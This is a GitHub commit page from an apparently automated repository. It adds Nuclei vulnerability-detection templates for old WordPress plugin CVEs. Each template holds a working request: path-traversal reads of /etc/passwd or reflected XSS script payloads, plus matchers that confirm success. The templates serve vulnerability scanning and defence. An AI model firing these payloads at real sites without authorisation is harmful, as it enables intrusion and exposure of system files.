Skip to content

Commit

Permalink
20241203
Browse files Browse the repository at this point in the history
  • Loading branch information
actions-user committed Dec 3, 2024
1 parent c1866e4 commit ef070c0
Show file tree
Hide file tree
Showing 62 changed files with 3,181 additions and 1 deletion.
2 changes: 1 addition & 1 deletion date.txt
Original file line number Diff line number Diff line change
@@ -1 +1 @@
20241202
20241203
60 changes: 60 additions & 0 deletions poc.txt

Large diffs are not rendered by default.

33 changes: 33 additions & 0 deletions poc/cve/CVE-2011-1669-2045.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,33 @@
id: CVE-2011-1669

info:
name: WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI)
author: daffainfo
severity: high
description: A directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669
- https://www.exploit-db.com/exploits/17119
- http://www.securityfocus.com/bid/47146
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2011-1669
tags: cve,cve2011,wordpress,wp-plugin,lfi

requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"

matchers-condition: and
matchers:

- type: regex
regex:
- "root:.*:0:0:"

- type: status
status:
- 200

# Enhanced by mp on 2022/02/18
30 changes: 30 additions & 0 deletions poc/cve/CVE-2011-5265-2124.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,30 @@
id: CVE-2011-5265

info:
name: Featurific For WordPress 1.6.2 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in cached_image.php in the Featurific For WordPress plugin 1.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the snum parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5265


requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
31 changes: 31 additions & 0 deletions poc/cve/CVE-2012-5913-2222.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,31 @@
id: CVE-2012-5913
info:
name: WordPress Integrator 1.32 - Reflected Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2012-5913
- https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-integrator-redirect_to-parameter-cross-site-scripting-1-32/
tags: cve,cve2012,wordpress,xss,wp-plugin
classification:
cve-id: CVE-2012-5913
requests:
- method: GET
path:
- '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E'
matchers-condition: and
matchers:
- type: word
words:
- "</sCripT><sCripT>alert(document.domain)</sCripT>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

# Enhanced by mp on 2022/02/21
30 changes: 30 additions & 0 deletions poc/cve/CVE-2013-3526-2252.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,30 @@
id: CVE-2013-3526

info:
name: WordPress Plugin Traffic Analyzer - 'aoid' Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-3526

description: "Cross-site scripting (XSS) vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter."

requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E'

matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(1)</script>"
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
36 changes: 36 additions & 0 deletions poc/cve/CVE-2013-4625-2270.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,36 @@
id: CVE-2013-4625
info:
name: WordPress Plugin Duplicator < 0.4.5 - Reflected Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2013-4625
- https://packetstormsecurity.com/files/122535/WordPress-Duplicator-0.4.4-Cross-Site-Scripting.html
- https://seclists.org/bugtraq/2013/Jul/160
- https://www.htbridge.com/advisory/HTB23162
remediation: Upgrade to Duplicator 0.4.5 or later.
classification:
cve-id: CVE-2013-4625
metadata:
google-query: inurl:"/wp-content/plugins/duplicator"
tags: cve,cve2013,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

# Enhanced by mp on 2022/02/24
31 changes: 31 additions & 0 deletions poc/cve/CVE-2015-1000012-2458.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,31 @@
id: CVE-2015-1000012

info:
name: MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI)
author: daffainfo
severity: high
reference:
- https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2015-1000012
cwe-id: CWE-200
description: "Local File Inclusion Vulnerability in mypixs v0.3 wordpress plugin"


requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd"

matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
part: body
- type: status
status:
- 200
29 changes: 29 additions & 0 deletions poc/cve/CVE-2015-6920-2582.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,29 @@
id: CVE-2015-6920
info:
name: sourceAFRICA <= 0.1.3 - Unauthenticated Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: WordPress sourceAFRICA plugin version 0.1.3 suffers from a cross site scripting vulnerability.
reference:
- https://packetstormsecurity.com/files/133371/
- https://nvd.nist.gov/vuln/detail/CVE-2015-6920
classification:
cve-id: CVE-2015-6920
tags: cve,cve2015,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '"></script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
38 changes: 38 additions & 0 deletions poc/cve/CVE-2016-1000136-2688.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,38 @@
id: CVE-2016-1000136

info:
name: heat-trackr v1.0 - XSS via heat-trackr_abtest_add.php
author: daffainfo
severity: medium
description: Reflected XSS in wordpress plugin heat-trackr v1.0
reference:
- http://www.vapidlabs.com/wp/wp_advisory.php?v=798
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000136
- https://wordpress.org/plugins/heat-trackr
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2016-1000136
cwe-id: CWE-79
tags: cve,cve2016,wordpress,xss,wp-plugin

requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
30 changes: 30 additions & 0 deletions poc/cve/CVE-2016-1000141-2708.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,30 @@
id: CVE-2016-1000141
info:
name: Page Layout builder v1.9.3 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Reflected XSS in wordpress plugin page-layout-builder v1.9.3
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000141
tags: cve,cve2016,wordpress,xss,wp-plugin
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2016-1000141
cwe-id: CWE-79
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
39 changes: 39 additions & 0 deletions poc/cve/CVE-2016-1000142-2712.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,39 @@
id: CVE-2016-1000142

info:
name: MW Font Changer <= 4.2.5 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: The MW Font Changer WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability.
reference:
- https://wpscan.com/vulnerability/4ff5d65a-ba61-439d-ab7f-745a0648fccc
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000142
- http://www.vapidlabs.com/wp/wp_advisory.php?v=435
- https://wordpress.org/plugins/parsi-font
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2016-1000142
cwe-id: CWE-79
tags: cve,cve2016,wordpress,wp-plugin,xss

requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
37 changes: 37 additions & 0 deletions poc/cve/CVE-2016-1000148-2724.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,37 @@
id: CVE-2016-1000148

info:
name: S3 Video Plugin <= 0.983 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference:
- https://wpscan.com/vulnerability/ead796ed-202a-451f-b041-d39c9cf1fb54
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000148
tags: cve,cve2016,wordpress,wp-plugin,xss
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2016-1000148
cwe-id: CWE-79
description: "Reflected XSS in wordpress plugin s3-video v0.983"

requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22"

matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script><"'
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
Loading

0 comments on commit ef070c0

Please sign in to comment.